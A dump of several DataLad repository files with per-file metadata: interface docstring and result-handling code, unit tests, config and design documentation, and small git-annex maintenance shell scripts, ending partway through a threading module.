textwrap import indent\n if len(cls_doc):\n cls_doc += \"\\n\"\n cls_doc += \" Examples\\n --------\\n\"\n # loop though provided examples\n for example in ex:\n cls_doc += indent(build_example(example, api='python'), ' '*4)\n\n return cls_doc\n\n\ndef build_doc(cls, **kwargs):\n \"\"\"Decorator to build docstrings for datalad commands\n\n It's intended to decorate the class, the __call__-method of which is the\n actual command. It expects that __call__-method to be decorated by\n eval_results.\n\n Note that values for any `eval_params` keys in `cls._params_` are\n ignored. This means one class may extend another's `_params_`\n without worrying about filtering out `eval_params`.\n\n Parameters\n ----------\n cls: Interface\n DataLad command implementation\n \"\"\"\n if datalad.in_librarymode():\n lgr.debug(\"Not assembling DataLad API docs in libary-mode\")\n return cls\n\n # Note, that this is a class decorator, which is executed only once when the\n # class is imported. It builds the docstring for the class' __call__ method\n # and returns the original class.\n #\n # This is because a decorator for the actual function would not be able to\n # behave like this. To build the docstring we need to access the attribute\n # _params of the class. From within a function decorator we cannot do this\n # during import time, since the class is being built in this very moment and\n # is not yet available in the module. And if we do it from within the part\n # of a function decorator, that is executed when the function is called, we\n # would need to actually call the command once in order to build this\n # docstring.\n\n lgr.debug(\"Building doc for %s\", cls)\n\n cls_doc = cls.__doc__\n if hasattr(cls, '_docs_'):\n # expand docs\n cls_doc = cls_doc.format(**cls._docs_)\n # get examples\n ex = getattr(cls, '_examples_', [])\n if ex:\n cls_doc = update_docstring_with_examples(cls_doc, ex)\n\n call_doc = None\n # suffix for update_docstring_with_parameters:\n if cls.__call__.__doc__:\n call_doc = cls.__call__.__doc__\n\n # build standard doc and insert eval_doc\n spec = getattr(cls, '_params_', dict())\n\n\n # update class attributes that may override defaults\n if not _has_eval_results_call(cls):\n add_args = None\n else:\n # defaults for all common parameters are guaranteed to be available\n # from the class\n add_args = {k: getattr(cls, k) for k in eval_params}\n\n # ATTN: An important consequence of this update() call is that it\n # fulfills the docstring's promise of overriding any existing\n # values for eval_params keys in _params_.\n #\n\n # get docs for eval_results parameters:\n spec.update(eval_params)\n\n update_docstring_with_parameters(\n cls.__call__, spec,\n prefix=alter_interface_docs_for_api(cls_doc),\n suffix=alter_interface_docs_for_api(call_doc),\n add_args=add_args\n )\n\n if hasattr(cls.__call__, '_dataset_method'):\n cls.__call__._dataset_method.__doc__ = cls.__call__.__doc__\n\n # return original\n return cls\n\n\nclass Interface(ABC):\n '''Abstract base class for DataLad command implementations\n\n Any DataLad command implementation must be derived from this class. The\n code snippet below shows a complete sketch of a Python class with such an\n implementation.\n\n Importantly, no instances of command classes will created. Instead the main\n entry point is a static ``__call__()`` method, which must be implemented\n for any command. It is incorporated as a function in :mod:`datalad.api`, by\n default under the name of the file the implementation resides (e.g.,\n ``command`` for a ``command.py`` file). Therefore the file should have a\n name that is a syntax-compliant function name. The default naming rule can\n be overwritten with an explicit alternative name (see\n :func:`datalad.interface.base.get_api_name`).\n\n For commands implementing functionality that is operating on DataLad\n datasets, a command can be also be bound to the\n :class:`~datalad.distribution.dataset.Dataset` class as a method using\n the ``@datasetmethod`` decorator, under the specified name.\n\n Any ``__call__()`` implementation should be decorated with\n :func:`datalad.interface.utils.eval_results`. This adds support for\n standard result processing, and a range of common command parameters that\n do not need to be manually added to the signature of ``__call__()``. Any\n implementation decorated in this way should be implemented as a generator,\n and ``yield`` :ref:`result records <chap_design_result_records>`.\n\n Any argument or keyword argument that appears in the signature of\n ``__call__()`` must have a matching item in :attr:`Interface._params_`.\n The dictionary maps argument names to\n :class:`datalad.support.param.Parameter` specifications. The specification\n contain CLI argument declarations, value constraint and data type\n conversation specifications, documentation, and optional\n ``argparse``-specific arguments for CLI parser construction.\n\n The class decorator :func:`datalad.interface.base.build_doc` inspects an\n :class:`Interface` implementation, and builds a standard docstring from\n various sources of structured information within the class (also see\n below). The documentation is automatically tuned differently, depending on\n the target API (Python vs CLI).\n\n .. code:: python\n\n @build_doc\n class ExampleCommand(Interface):\n \"\"\"SHORT DESCRIPTION\n\n LONG DESCRIPTION\n ...\n \"\"\"\n\n # COMMAND PARAMETER DEFINITIONS\n _params_ = dict(\n example=Parameter(\n args=(\"--example\",),\n doc=\"\"\"Parameter description....\"\"\",\n constraints=...),\n ...\n )\n )\n\n # RESULT PARAMETER OVERRIDES\n return_type= 'list'\n ...\n\n # USAGE EXAMPLES\n _examples_ = [\n dict(text=\"Example description...\",\n code_py=\"Example Python code...\",\n code_cmd=\"Example shell code ...\"),\n ...\n ]\n\n @staticmethod\n @datasetmethod(name='example_command')\n @eval_results\n def __call__(example=None, ...):\n ...\n\n yield dict(...)\n\n The basic implementation setup described above can be customized for\n individual commands in various way that alter the behavior and\n presentation of a specific command. The following overview uses\n the code comment markers in the above snippet to illustrate where\n in the class implementation these adjustments can be made.\n\n (SHORT/LONG) DESCRIPTION\n\n ``Interface.short_description`` can be defined to provide an\n explicit short description to be used in documentation and help output,\n replacing the auto-generated extract from the first line of the full\n description.\n\n COMMAND PARAMETER DEFINITIONS\n\n When a parameter specification declares ``Parameter(args=tuple(), ...)``,\n i.e. no arguments specified, it will be ignored by the CLI. Likewise, any\n ``Parameter`` specification for which :func:`is_api_arg` returns ``False``\n will also be ignored by the CLI. Additionally, any such parameter will\n not be added to the parameter description list in the Python docstring.\n\n RESULT PARAMETER OVERRIDES\n\n The :func:`datalad.interface.utils.eval_results` decorator automatically\n add a range of additional arguments to a command, which are defined in\n :py:data:`datalad.interface.common_opts.eval_params`. For any such\n parameter an Interface implementation can define an interface-specific\n default value, by declaring a class member with the respective parameter\n name and the desired default as its assigned value. This feature can be\n used to tune the default command behavior, for example, with respect to the\n default result rendering style, or its error behavior.\n\n In addition to the common parameters of the Python API, an additional\n ``Interface.result_renderer_cmdline`` can be defined, in order to\n instruct the CLI to prefer the specified alternative result renderer\n over an ``Interface.result_renderer`` specification.\n\n USAGE EXAMPLES\n\n Any number of usage examples can be described in an ``_examples_`` list\n class attribute. Such an example contains a description, and code examples\n for Python and CLI.\n '''\n _params_ = {}\n\n @abstractmethod\n def __call__():\n \"\"\"Must be implemented by any command\"\"\"\n\n # https://github.com/datalad/datalad/issues/6376\n @classmethod\n def get_refds_path(cls, dataset):\n \"\"\"Return a resolved reference dataset path from a `dataset` argument\n\n .. deprecated:: 0.16\n Use ``require_dataset()`` instead.\n \"\"\"\n # theoretically a dataset could come in as a relative path -> resolve\n if dataset is None:\n return dataset\n refds_path = dataset.path if isinstance(dataset, Dataset) \\\n else Dataset(dataset).path\n if refds_path:\n refds_path = str(resolve_path(refds_path))\n return refds_path\n\n\n# pull all defaults from all eval_results() related parameters and assign them\n# as attributes to the class, which then becomes the one place to query for\n# default and potential overrides\nfor k, p in eval_params.items():\n setattr(Interface,\n # name is always given\n k,\n # but there may be no default (rather unlikely, though)\n p.cmd_kwargs.get('default', None))\n\n\ndef get_allargs_as_kwargs(call, args, kwargs):\n \"\"\"Generate a kwargs dict from a call signature and ``*args``, ``**kwargs``\n\n Basically resolving the argnames for all positional arguments, and\n resolving the defaults for all kwargs that are not given in a kwargs\n dict\n \"\"\"\n from datalad.utils import getargspec\n argspec = getargspec(call, include_kwonlyargs=True)\n defaults = argspec.defaults\n nargs = len(argspec.args)\n defaults = defaults or [] # ensure it is a list and not None\n assert (nargs >= len(defaults))\n # map any args to their name\n argmap = list(zip(argspec.args[:len(args)], args))\n kwargs_ = dict(argmap)\n # map defaults of kwargs to their names (update below)\n for k, v in zip(argspec.args[-len(defaults):], defaults):\n if k not in kwargs_:\n kwargs_[k] = v\n # update with provided kwarg args\n kwargs_.update(kwargs)\n # XXX we cannot assert the following, because our own highlevel\n # API commands support more kwargs than what is discoverable\n # from their signature...\n #assert (nargs == len(kwargs_))\n return kwargs_\n\n\n# Only needed to support command implementations before the introduction\n# of @eval_results\ndef _has_eval_results_call(cls):\n \"\"\"Return True if cls has a __call__ decorated with @eval_results\n \"\"\"\n return getattr(getattr(cls, '__call__', None), '_eval_results', False)\n\n\ndef eval_results(wrapped):\n \"\"\"Decorator for return value evaluation of datalad commands.\n\n Note, this decorator is only compatible with commands that return\n status dict sequences!\n\n Two basic modes of operation are supported: 1) \"generator mode\" that\n `yields` individual results, and 2) \"list mode\" that returns a sequence of\n results. The behavior can be selected via the kwarg `return_type`.\n Default is \"list mode\".\n\n This decorator implements common functionality for result rendering/output,\n error detection/handling, and logging.\n\n Result rendering/output configured via the `result_renderer` keyword\n argument of each decorated command. Supported modes are: 'generic' (a\n generic renderer producing one line per result with key info like action,\n status, path, and an optional message); 'json' (a complete JSON line\n serialization of the full result record), 'json_pp' (like 'json', but\n pretty-printed spanning multiple lines), 'tailored' custom output\n formatting provided by each command class (if any), or 'disabled' for\n no result rendering.\n\n Error detection works by inspecting the `status` item of all result\n dictionaries. Any occurrence of a status other than 'ok' or 'notneeded'\n will cause an IncompleteResultsError exception to be raised that carries\n the failed actions' status dictionaries in its `failed` attribute.\n\n Status messages will be logged automatically, by default the following\n association of result status and log channel will be used: 'ok' (debug),\n 'notneeded' (debug), 'impossible' (warning), 'error' (error). Logger\n instances included in the results are used to capture the origin of a\n status report.\n\n Parameters\n ----------\n func: function\n __call__ method of a subclass of Interface,\n i.e. a datalad command definition\n \"\"\"\n\n @wraps(wrapped)\n def eval_func(*args, **kwargs):\n lgr.log(2, \"Entered eval_func for %s\", wrapped)\n # determine the command class associated with `wrapped`\n wrapped_class = get_wrapped_class(wrapped)\n\n # retrieve common options from kwargs, and fall back on the command\n # class attributes, or general defaults if needed\n kwargs = kwargs.copy() # we will pop, which might cause side-effect\n common_params = {\n p_name: kwargs.pop(\n # go with any explicitly given default\n p_name,\n # otherwise determine the command class and pull any\n # default set in that class\n getattr(wrapped_class, p_name))\n for p_name in eval_params}\n\n # short cuts and configured setup for common options\n return_type = common_params['return_type']\n\n if return_type == 'generator':\n # hand over the generator\n lgr.log(2,\n \"Returning generator_func from eval_func for %s\",\n wrapped_class)\n return _execute_command_(\n interface=wrapped_class,\n cmd=wrapped,\n cmd_args=args,\n cmd_kwargs=kwargs,\n exec_kwargs=common_params,\n )\n else:\n @wraps(_execute_command_)\n def return_func(*args_, **kwargs_):\n results = _execute_command_(\n interface=wrapped_class,\n cmd=wrapped,\n cmd_args=args,\n cmd_kwargs=kwargs,\n exec_kwargs=common_params,\n )\n if inspect.isgenerator(results):\n # unwind generator if there is one, this actually runs\n # any processing\n results = list(results)\n if return_type == 'item-or-list' and \\\n len(results) < 2:\n return results[0] if results else None\n else:\n return results\n\n lgr.log(2,\n \"Returning return_func from eval_func for %s\",\n wrapped_class)\n return return_func(*args, **kwargs)\n\n ret = eval_func\n ret._eval_results = True\n return ret\n\n\ndef _execute_command_(\n *,\n interface: anInterface,\n cmd: Callable[..., Generator[Dict, None, None]],\n cmd_args: tuple,\n cmd_kwargs: Dict,\n exec_kwargs: Dict,\n) -> Generator[Dict, None, None]:\n \"\"\"Internal helper to drive a command execution generator-style\n\n Parameters\n ----------\n interface:\n Interface class of associated with the `cmd` callable\n cmd:\n A DataLad command implementation. Typically the `__call__()` of\n the given `interface`.\n cmd_args:\n Positional arguments for `cmd`.\n cmd_kwargs:\n Keyword arguments for `cmd`.\n exec_kwargs:\n Keyword argument affecting the result handling.\n See `datalad.interface.common_opts.eval_params`.\n \"\"\"\n # for result filters and validation\n # we need to produce a dict with argname/argvalue pairs for all args\n # incl. defaults and args given as positionals\n allkwargs = get_allargs_as_kwargs(\n cmd,\n cmd_args,\n {**cmd_kwargs, **exec_kwargs},\n )\n\n # validate the complete parameterization\n _validate_cmd_call(interface, allkwargs)\n\n # look for potential override of logging behavior\n result_log_level = dlcfg.get('datalad.log.result-level', 'debug')\n # resolve string labels for transformers too\n result_xfm = known_result_xfms.get(\n allkwargs['result_xfm'],\n # use verbatim, if not a known label\n allkwargs['result_xfm'])\n result_filter = get_result_filter(allkwargs['result_filter'])\n result_renderer = allkwargs['result_renderer']\n if result_renderer == 'tailored' and not hasattr(interface,\n 'custom_result_renderer'):\n # a tailored result renderer is requested, but the class\n # does not provide any, fall back to the generic one\n result_renderer = 'generic'\n if result_renderer == 'default':\n # standardize on the new name 'generic' to avoid more complex\n # checking below\n result_renderer = 'generic'\n\n # figure out which hooks are relevant for this command execution\n # query cfg for defaults\n # .is_installed and .config can be costly, so ensure we do\n # it only once. See https://github.com/datalad/datalad/issues/3575\n dataset_arg = allkwargs.get('dataset', None)\n ds = None\n if dataset_arg is not None:\n from datalad.distribution.dataset import Dataset\n if isinstance(dataset_arg, Dataset):\n ds = dataset_arg\n else:\n try:\n ds = Dataset(dataset_arg)\n except ValueError:\n pass\n # look for hooks\n hooks = get_jsonhooks_from_config(ds.config if ds else dlcfg)\n # end of hooks discovery\n\n # flag whether to raise an exception\n incomplete_results = []\n # track what actions were performed how many times\n action_summary = {}\n\n # if a custom summary is to be provided, collect the results\n # of the command execution\n results = []\n do_custom_result_summary = result_renderer in (\n 'tailored', 'generic', 'default') and hasattr(\n interface,\n 'custom_result_summary_renderer')\n pass_summary = do_custom_result_summary \\\n and getattr(interface,\n 'custom_result_summary_renderer_pass_summary',\n None)\n\n # process main results\n for r in _process_results(\n # execution\n cmd(*cmd_args, **cmd_kwargs),\n interface,\n allkwargs['on_failure'],\n # bookkeeping\n action_summary,\n incomplete_results,\n # communication\n result_renderer,\n result_log_level,\n # let renderers get to see how a command was called\n allkwargs):\n for hook, spec in hooks.items():\n # run the hooks before we yield the result\n # this ensures that they are executed before\n # a potentially wrapper command gets to act\n # on them\n if match_jsonhook2result(hook, r, spec['match']):\n lgr.debug('Result %s matches hook %s', r, hook)\n # a hook is also a command that yields results\n # so yield them outside too\n # users need to pay attention to void infinite\n # loops, i.e. when a hook yields a result that\n # triggers that same hook again\n for hr in run_jsonhook(hook, spec, r, dataset_arg):\n # apply same logic as for main results, otherwise\n # any filters would only tackle the primary results\n # and a mixture of return values could happen\n if not keep_result(hr, result_filter, **allkwargs):\n continue\n hr = xfm_result(hr, result_xfm)\n # rationale for conditional is a few lines down\n if hr:\n yield hr\n if not keep_result(r, result_filter, **allkwargs):\n continue\n r = xfm_result(r, result_xfm)\n # in case the result_xfm decided to not give us anything\n # exclude it from the results. There is no particular reason\n # to do so other than that it was established behavior when\n # this comment was written. This will not affect any real\n # result record\n if r:\n yield r\n\n # collect if summary is desired\n if do_custom_result_summary:\n results.append(r)\n\n # result summary before a potential exception\n # custom first\n if do_custom_result_summary:\n if pass_summary:\n summary_args = (results, action_summary)\n else:\n summary_args = (results,)\n interface.custom_result_summary_renderer(*summary_args)\n elif result_renderer in ('generic', 'default') \\\n and action_summary \\\n and sum(sum(s.values())\n for s in action_summary.values()) > 1:\n # give a summary in generic mode, when there was more than one\n # action performed\n render_action_summary(action_summary)\n\n if incomplete_results:\n raise IncompleteResultsError(\n failed=incomplete_results,\n msg=\"Command did not complete successfully\")\n\n\ndef _validate_cmd_call(interface: anInterface, kwargs: Dict) -> None:\n \"\"\"Validate a parameterization of a command call\n\n This is called by `_execute_command_()` before a command call, with\n the respective Interface sub-type of the command, and all its\n arguments in keyword argument dict style. This dict also includes\n the default values for any parameter that was not explicitly included\n in the command call.\n\n This expected behavior is to raise an exception whenever an invalid\n parameterization is encountered.\n\n This default implementation performs no validation.\n \"\"\"\n pass\n" }, { "alpha_fraction": 0.7572148442268372, "alphanum_fraction": 0.7572148442268372, "avg_line_length": 34.78688430786133, "blob_id": "fd748ab0f648334dc2bd60209ac38a35d81c7e3c", "content_id": "7857be225537cb048b57341c2b17ad2da01eeea4", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2183, "license_type": "permissive", "max_line_length": 77, "num_lines": 61, "path": "/docs/config-format.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "Config file format\n==================\n\nIncludes\n--------\n\n:mod:`~datalad.config` enhances class:`~ConfigParser.SafeConfigParser`\nto also support includes. It makes it possible to specify within the\n`INCLUDES` section of the config file which other config file should\nbe considered before or after a currently read config file::\n\n [INCLUDES]\n before = defaults.cfg\n after = customizations.cfg\n\n [DEFAULTS]\n ....\n\nSections\n--------\n\nDownload section\n~~~~~~~~~~~~~~~~\n\nIt is the only type of a section at this point. It specifies a single\nresource which crawl/monitor and fetch specified content to be\ndeposited into the git/git-annex repository. Following fields are\nknown and could either be specified in the specific section or in\n`DEFAULT` section to be reused across different sections\n\nmode\n Could be `download`, `fast` or `relaxed`. In `download` mode files\n are downloaded, and added to the git-annex, thus based on a checksum\n backend. `fast` and `relaxed` modes correspond to the modes of `git\n annex addurl`\nincoming\n Path to the `incoming` repository -- where everything gets initially\n imported, e.g. original archives. If no archives to be extracted,\n it usually then matches with `public`. Original idea for such a\n separation was to cover the cases where incoming materials\n (archives) might contain some non-distributable materials which\n should be stripped before being placed into `public` repository\npublic\n Path to the `public` repository which is the target repository to be\n shared\ndescription\n Textual description to be placed under :file:`.git/description`\ninclude_href\n Regular expression to specify which URLs, pointed to by HTML `<A>`\n should be considered to be added to the repository\ninclude_href_a\n Regular expression to specify which links with matching text should\n be considered\nexclude_href, exclude_href_a\n Similar setups to specify which ones to exclude (e.g. if `include_href=.*`)\nrecurse\n Regular expression to specify which URLs to consider for further\n traversal while crawling the website\n\nTODO. Some additional documentation is currently within\n:meth:`datalad.config.EnhancedConfigParser.get_default`\n" }, { "alpha_fraction": 0.6086508631706238, "alphanum_fraction": 0.6104531288146973, "avg_line_length": 30.07200050354004, "blob_id": "abc0ae52d01f7c87f0d35b1afd4e75636e0436f3", "content_id": "7dda2fab5f93dbcb0dc83db262aa777eee7ccd67", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3884, "license_type": "permissive", "max_line_length": 87, "num_lines": 125, "path": "/datalad/interface/tests/test_docs.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for interface doc wranglers.\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom datalad.interface.base import (\n alter_interface_docs_for_api,\n dedent_docstring,\n)\nfrom datalad.tests.utils_pytest import (\n assert_false,\n assert_in,\n assert_not_in,\n)\n\ndemo_doc = \"\"\"\\\n Bla bla summary\n\n Generic intro blurb. Ping pong ping pong ping pong ping pong. Ping pong ping\n pong ping pong ping pong. Ping pong ping pong ping pong ping pong. Ping pong\n ping pong ping pong ping pong. Ping pong ping pong ping pong ping pong. Ping\n pong ping pong ping pong ping pong.\n\n || CMDLINE >>\n || REFLOW >>\n Something for the cmdline only\n Multiline!\n << REFLOW ||\n << CMDLINE ||\n\n || REFLOW >>\n a\n b\n << REFLOW ||\n not\n reflowed\n || REFLOW >>\n c\n << REFLOW ||\n\n || PYTHON >>\n\n || REFLOW >>\n Some Python-only bits\n Multiline!\n << REFLOW ||\n\n << PYTHON ||\n\n And an example for in-line markup: [PY: just for Python PY] and\n the other one [CMD: just for the command line CMD]. [PY: multiline\n python-only with [ brackets [] ] PY][CMD: multiline cli-only with [ brackets\n [] ] CMD]. End of demo.\n\n Generic appendix. Ding dong ding dong ding dong. Ding dong ding dong ding\n dong. Ding dong ding dong ding dong. Ding dong ding dong ding dong. Ding\n dong ding dong ding dong.\n\n\"\"\"\n\ndemo_paramdoc = \"\"\"\\\n\n Parameters\n ----------\n dataset : Dataset or None, optional\n something [PY: python only PY] in between [CMD: cmdline only CMD] appended\n Brackets can also be within and we can deal with [PY: multiline\n python-only with [ some brackets [] PY] [CMD: multiline cli-only [\n brackets included [ can we also have || ?] CMD].\n dataset is given, an attempt is made to identify the dataset based\n Dataset (e.g. a path), or value must be `None`. [Default: None]\n\"\"\"\n\ndemo_argdoc = \"\"\"\\\n specify the dataset to perform the install operation\n on. If no dataset is given, an attempt is made to\n identify the dataset based on the current working\n directory and/or the `path` given. Constraints: Value\n must be a Dataset or a valid identifier of a Dataset\n (e.g. a path), or value must be `None`. [Default:\n None]\n\"\"\"\n\n\ndef test_dedent():\n assert_false(dedent_docstring(\"one liner\").endswith(\"\\n\"))\n\n\ndef test_alter_interface_docs_for_api():\n alt = alter_interface_docs_for_api(demo_doc)\n alt_l = alt.split('\\n')\n # de-dented\n assert_false(alt_l[0].startswith(' '))\n assert_false(alt_l[-1].startswith(' '))\n assert_not_in('CMD', alt)\n assert_not_in('PY', alt)\n assert_not_in('REFLOW', alt)\n assert_in('a b', alt)\n assert_in('not\\n reflowed', alt)\n assert_in(\"Some Python-only bits Multiline!\", alt)\n assert_in(\"Some Python-only bits\", alt)\n assert_in(\"just for Python\", alt)\n assert_not_in(\"just for the command line\", alt)\n assert_not_in(\"multiline cli-only with [ brackets\\n[] ]\", alt)\n assert_in(\"multiline\\npython-only with [ brackets [] ]\", alt)\n\n altpd = alter_interface_docs_for_api(demo_paramdoc)\n assert_not_in(\"PY\", altpd)\n assert_not_in(\"CMD\", altpd)\n assert_in('python', altpd)\n assert_in('in between', altpd)\n assert_in('appended', altpd)\n assert_in(\"multiline\\n python-only with [ some brackets []\", altpd)\n assert_not_in('cmdline', altpd)\n assert_not_in(\"multiline cli-only [\\n brackets included \"\n \"[ can we also have || ?]\", altpd)\n" }, { "alpha_fraction": 0.634854793548584, "alphanum_fraction": 0.6514523029327393, "avg_line_length": 25.77777862548828, "blob_id": "9721f57a9a585cb7efdceedf43c608ed057402bb", "content_id": "180e32f1f5783ca07599f08ba55c0ba27ab73f3c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 241, "license_type": "permissive", "max_line_length": 64, "num_lines": 9, "path": "/tools/bisect-git-annex.scripts/bisect-git-annex-doublepasswd.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\nset -eu\n\nerr=\"thread blocked indefinitely\"\n\ncd ~/QA\n# script doesn't work in a script since probably no tty\ntimeout 10 script -f -c 'git annex get -J2 sub-*' || :\ntest 1 -eq `sed -e 's, ,\\n,g' typescript | grep -c 'password:' `\n" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6068181991577148, "avg_line_length": 27.387096405029297, "blob_id": "9a8cba925d0622b51912cbf98a307521498c2182", "content_id": "fec42f32c500b7a4b29b65b617c0ce343b6a09ca", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 880, "license_type": "permissive", "max_line_length": 64, "num_lines": 31, "path": "/tools/convert-git-annex-layout", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -eu\n\nto=\"$1\"\n\necho \"Initial fsck:\"\ngit annex fsck --fast 2>&1 | python -m tqdm --null\necho \"Going through objects: \"\nfor f in .git/annex/objects/*/*/*; do\n key=$(basename $f)\n keydir=$(dirname $f)\n newhashdir=$(git annex examinekey --format=\"\\${$to}\" \"$key\")\n targetdir=\".git/annex/objects/$newhashdir\"\n test -n \"$newhashdir\"\n if [ \"$keydir\" = \"${targetdir%/}\" ]; then\n continue\n fi\n echo \" $f -> $newhashdir\"\n # This was a wrong assumption - there could be multiple\n # keys in the same directory so we might have it already.\n # But I still feel we might need some test here\n #if test -e \"$targetdir\"; then\n # echo \"$targetdir already exists\"\n # exit 1\n #fi\n mkdir -p \"$(dirname $targetdir)\"\n mv \"$keydir\" \"${targetdir%/}\"\ndone\necho \"Final fsck:\"\ngit annex fsck --fast 2>&1 | python -m tqdm --null\n" }, { "alpha_fraction": 0.7210769653320312, "alphanum_fraction": 0.7269667387008667, "avg_line_length": 45.6274528503418, "blob_id": "e2efe806cd704b056b81bfc6bbe2594e25801d91", "content_id": "9ba1161e4fc4d2071212f6af8a0fe14600956792", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2377, "license_type": "permissive", "max_line_length": 117, "num_lines": 51, "path": "/docs/source/design/pos_vs_kw_parameters.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_pos_vs_kw_parameters:\n\n********************************\nPositional vs Keyword parameters\n********************************\n\n.. topic:: Specification scope and status\n\n This specification is a proposal, subject to review and further discussion.\n Technical preview was implemented in the `PR #6176 <https://github.com/datalad/datalad/pull/6176>`_.\n\nMotivation\n==========\n\nPython allows for keyword arguments (arguments with default values) to be specified positionally.\nThat complicates addition or removal of new keyword arguments since such changes must account for their possible\npositional use.\nMoreover, in case of our Interface's, it contributes to inhomogeneity since when used in :term:`CLI`, all keyword\narguments\nmust be specified via non-positional ``--<option>``'s, whenever Python interface allows for them to be used\npositionally.\n\nPython 3 added possibility to use a ``*`` separator in the function definition to mandate that all keyword arguments\n*after* it must be be used only via keyword (``<option>=<value>``) specification.\nIt is encouraged to use ``*`` to explicitly separate out positional from keyword arguments in majority of the cases,\nand below we outline two major types of constructs.\n\nInterfaces\n==========\n\nSubclasses of the :class:`~datalad.interface.base.Interface` provide specification and implementation for both\n:term:`CLI` and Python API interfaces.\nAll new interfaces must separate all CLI ``--options`` from positional arguments using ``*`` in their ``__call__``\nsignature.\n\n**Note:** that some positional arguments could still be optional (e.g., destination ``path`` for ``clone``),\nand thus should be listed **before** ``*``, despite been defined as a keyword argument in the ``__call__`` signature.\n\nA unit-test will be provided to guarantee such consistency between :term:`CLI` and Python interfaces.\nOverall, exceptions to this rule could be only some old(er) interfaces.\n\nRegular functions and methods\n=============================\n\nUse of ``*`` is encouraged for any function (or method) with keyword arguments.\nGenerally, ``*`` should come before the first keyword argument, but similarly to the Interfaces above, it is left to\nthe discretion of the developer to possibly allocate some (just few) arguments which could be used positionally if\nspecified." }, { "alpha_fraction": 0.54513019323349, "alphanum_fraction": 0.545923113822937, "avg_line_length": 28.443580627441406, "blob_id": "39bba393fb5c6638204e60b245c3772f147b3651", "content_id": "8b11e3fe4bc62257ce7bd3635770d3a187ef78ad", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7567, "license_type": "permissive", "max_line_length": 82, "num_lines": 257, "path": "/datalad/runner/runnerthreads.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from __future__ import annotations\n\nimport logging\nimport os\nimport threading\nfrom abc import (\n ABCMeta,\n abstractmethod,\n)\nfrom enum import Enum\nfrom queue import (\n Full,\n Queue,\n)\nfrom subprocess import Popen\nfrom typing import (\n IO,\n Any,\n Optional,\n)\n\nfrom datalad.utils import COPY_BUFSIZE\n\nlgr = logging.getLogger(\"datalad.runner.runnerthreads\")\n\n\ndef _try_close(file_object: Optional[IO]) -> None:\n if file_object is not None:\n try:\n file_object.close()\n except OSError:\n pass\n\n\nclass IOState(Enum):\n ok = \"ok\"\n process_exit = \"process_exit\"\n\n\nclass SignalingThread(threading.Thread):\n def __init__(self,\n identifier: str,\n signal_queues: list[Queue[tuple[Any, IOState, Optional[bytes]]]]\n ) -> None:\n\n super().__init__(daemon=True)\n self.identifier = identifier\n self.signal_queues = signal_queues\n\n def __repr__(self) -> str:\n return f\"Thread<{self.identifier}>\"\n\n def __str__(self) -> str:\n return self.__repr__()\n\n def signal(self,\n content: tuple[Any, IOState, Optional[bytes]]\n ) -> bool:\n error_occurred = False\n for signal_queue in self.signal_queues:\n try:\n signal_queue.put(content, block=True, timeout=.1)\n except Full:\n lgr.debug(\"timeout while trying to signal: %s\", content)\n error_occurred = True\n return not error_occurred\n\n\nclass WaitThread(SignalingThread):\n \"\"\"\n Instances of this thread wait for a process to exit and enqueue\n an exit event in the signal queues.\n \"\"\"\n def __init__(self,\n identifier: str,\n signal_queues: list[Queue[tuple[Any, IOState, Optional[bytes]]]],\n process: Popen\n ) -> None:\n super().__init__(identifier, signal_queues)\n self.process = process\n\n def run(self) -> None:\n\n lgr.log(5, \"%s (%s) started\", self.identifier, self)\n\n self.process.wait()\n self.signal((self.identifier, IOState.process_exit, None))\n\n lgr.log(5, \"%s (%s) exiting\", self.identifier, self)\n\n\nclass ExitingThread(SignalingThread):\n def __init__(self,\n identifier: str,\n signal_queues: list[Queue[tuple[Any, IOState, Optional[bytes]]]]\n ) -> None:\n\n super().__init__(identifier, signal_queues)\n self.exit_requested = False\n\n def request_exit(self) -> None:\n \"\"\"\n Request the thread to exit. This is not guaranteed to\n have any effect, because the instance has to check for\n self.exit_requested and act accordingly. It might not\n do that.\n \"\"\"\n self.exit_requested = True\n\n\nclass TransportThread(ExitingThread, metaclass=ABCMeta):\n def __init__(self,\n identifier: str,\n signal_queues: list[Queue[tuple[Any, IOState, Optional[bytes]]]],\n user_info: Any\n ) -> None:\n\n super().__init__(identifier, signal_queues)\n self.user_info = user_info\n\n def __repr__(self) -> str:\n return f\"Thread<({self.identifier}, {self.user_info})>\"\n\n def __str__(self) -> str:\n return self.__repr__()\n\n def signal_event(self,\n state: IOState,\n data: Optional[bytes]\n ) -> bool:\n return self.signal((self.user_info, state, data))\n\n @abstractmethod\n def read(self) -> Optional[bytes]:\n \"\"\"\n Read data from source return None, if source is close,\n or destination close is required.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def write(self,\n data: bytes\n ) -> bool:\n \"\"\"\n Write given data to destination, return True if data is\n written successfully, False otherwise.\n \"\"\"\n raise NotImplementedError\n\n def run(self) -> None:\n\n 